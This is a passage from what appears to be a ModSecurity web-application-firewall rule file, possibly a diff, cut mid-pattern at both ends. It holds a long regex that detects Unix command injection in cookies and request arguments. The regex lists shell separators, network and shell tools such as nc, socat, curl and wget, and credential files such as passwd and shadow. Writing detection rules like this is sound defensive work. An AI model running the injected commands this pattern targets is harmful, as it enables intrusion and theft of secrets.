(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|p(?:t(?:[\s\x0b&\),<>\|]|$|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(
?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|(?:an|io)(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:(?:t|rl)(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|ontab))|d(?:(?:[dfu]|i(?:(?:alo)?g|ff)|ash|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:b|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|letest|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:m(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\)
,<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|(?:rb|conv)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|inks|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|(?:c(?:at|mp))?(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|il[qx]|ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|rted|tch)(?:[
\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p(?:[^\s\x0b]{1,10}\b|[\s\x0b&\),<>\|]|$)|dstat|(?:gz|ng6?)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|grep|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|place)(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|t(?:[\s\x0b&\),<>\|]|$|-(?:dump|tar))|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:c(?:p|hed|ript)|g|ash|diff|(?:ft|na)p|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|sh(?:[\s\x0b&\),<>\|]|$|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|u(?:[\s\x0b&\),<>\|]|$|do(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:cat(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]
|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|skset)|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|medatectl)|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|$|diff)|(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:3m|c|atch|get)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|oami)|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|y(?:um|arn|elp)(?:[\s\x0b&\),<>\|]|$)|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|ypper))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\
||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7z[arx]?|(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)[\s\x0b&\),<>\|]|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)[\s\x0b&\),<>\|]|p(?:t(?:[\s\x0b&\),<>\|]|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:(?:p|ch)?[\s\x0b&\),<>\|]|j(?:[\s\x0b&\),<>\|]|-register|disp)|ia2c)|s(?:h[\s\x0b&\),<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|]))|c(?:[89]9(?:[\s\x0b&\),<>\|]|-gcc)|(?:a(?:t|ncel|psh)|c|mp)[\s\x0b&\),<>\|]|p(?:(?:an|io)?[\s\x0b&\),<>\|]|ulimit)|s(?:(?:h|cli)[\s\x0b&\),<>\|]|plit|vtool)|u(?:(?:t|rl)[\s\x0b&\),<>\|]|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0
b&\),<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)[\s\x0b&\),<>\|]|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:(?:[bd]|qn|s(?:h|ac)?|cho|fax|grep|macs|val)[\s\x0b&\),<>\|]|n(?:v(?:[\s\x0b&\),<>\|]|-update)|d(?:if|sw)[\s\x0b&\),<>\|])|x(?:(?:ec|p(?:and|(?:ec|or)t|r))?[\s\x0b&\),<>\|]|iftool)|2fsck|asy_install)|f(?:(?:c|g(?:rep)?|mt|etch|lock|unction)[\s\x0b&\),<>\|]|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\),<>\|]|le(?:[\s\x0b&\),<>\|]|test))|tp(?:[\s\x0b&\),<>\|]|stats|who)|acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|o(?:ld[\s\x0b&\),<>\|]|reach)|ping[\s\x0b&\),6<>\|])|g(?:c(?:c[^\s\x0b]{1,10}\b|ore[\s\x0b&\),<>\|])|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:m[\s\x0b&\),<>\|]|ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-?[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:c(?:at)?|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:d|rb|conv|nstall)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top[\s\x0b&\),<>\|])|onice|spell)|j(?:(?:js|q|ava|exec)[\s\x0b&\),<>\|]|o(?:(?:bs|in)[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:s(?:h[\s\x0b&\),<>\|]|shell)|ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|])|l(?:d(?:d?[\s\x0b&\),<>\|]|config)|(?:[np]|inks|ynx)[\s\x0b&\),<>\|]|s(?:(?:-F|cpu|hw|mod|of|pci|usb)?[\s\x0b&\),<>\|]|b_release)|ua(?:[\s\x0b&\),<>\|]|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|c(?:[\s\x0b&\),<>\|]|at))|(?:c(?:at|mp))?[\s\x0b&\),<>\|]|dif
f|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore))|a(?:st(?:(?:comm)?[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|ess(?:[\s\x0b&\),<>\|]|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:(?:a(?:n|il[qx]?|ke|wk)|tr|v|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:squitto|unt[\s\x0b&\),<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:(?:at)?[\s\x0b&\),<>\|]|\.(?:openbsd|traditional))|e(?:t(?:[\s\x0b&\),<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|m(?:ap)?|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)[\s\x0b&\),<>\|]|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:(?:d|ctave)[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:[\s\x0b&\),<>\|]|2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|(?:f(?:tp)?|g(?:rep)?|(?:w|op)d|xz|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:[57]?[\s\x0b&\),<>\|]|-cgi)|i(?:(?:co?|gz|ng6?)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|[^\s\x0b]{1,10}\b)|dstat)|k(?:g(?:[\s\x0b&\),<>\|]|_?info)|exec|ill[\s\x0b&\),<>\|])|r(?:y?